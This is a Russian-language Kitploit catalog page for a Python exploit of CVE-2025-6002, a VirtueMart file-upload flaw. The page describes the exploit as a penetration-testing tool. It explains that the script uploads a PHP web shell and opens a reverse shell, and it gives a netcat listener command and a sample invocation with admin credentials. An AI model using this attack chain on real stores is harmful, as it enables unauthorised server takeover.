Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6002 — Эксплойт на Python для CVE-2025-6002, нацеленный на аутентифицированную произвольную загрузку файлов в VirtueMart < 4.4.10. Выполняет вход, загружает PHP-веб-шелл и запускает обратную оболочку для тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Эксплойт на Python для CVE-2025-6002, нацеленный на аутентифицированную произвольную загрузку файлов в VirtueMart < 4.4.10. Выполняет вход, загружает PHP-веб-шелл и запускает обратную оболочку для тестирования на проникновение.

Репозиторий
106 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт для CVE-2025-6002

Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов с аутентификацией в VirtueMart < 4.4.10 (CVE-2025-6002), описанную в этом посте блога: https://blog.blacklanternsecurity.com/p/doomla-zero-days

Скрипт входит в VirtueMart с предоставленными учетными данными, создает новый товар и загружает PHP-вебшелл как медиафайл. Затем он запускает обратную оболочку на указанный IP/порт.

Параметры:

  • --url: URL VirtueMart
  • --username: имя администратора
  • --password: пароль администратора
  • --remote-ip: IP-адрес атакующегоhttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: порт атакующего

Использование:

  1. Запустите Netcat на атакующей машине:
nc -nlvp 1337
  1. Выполните эксплойт
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Скачать инструмент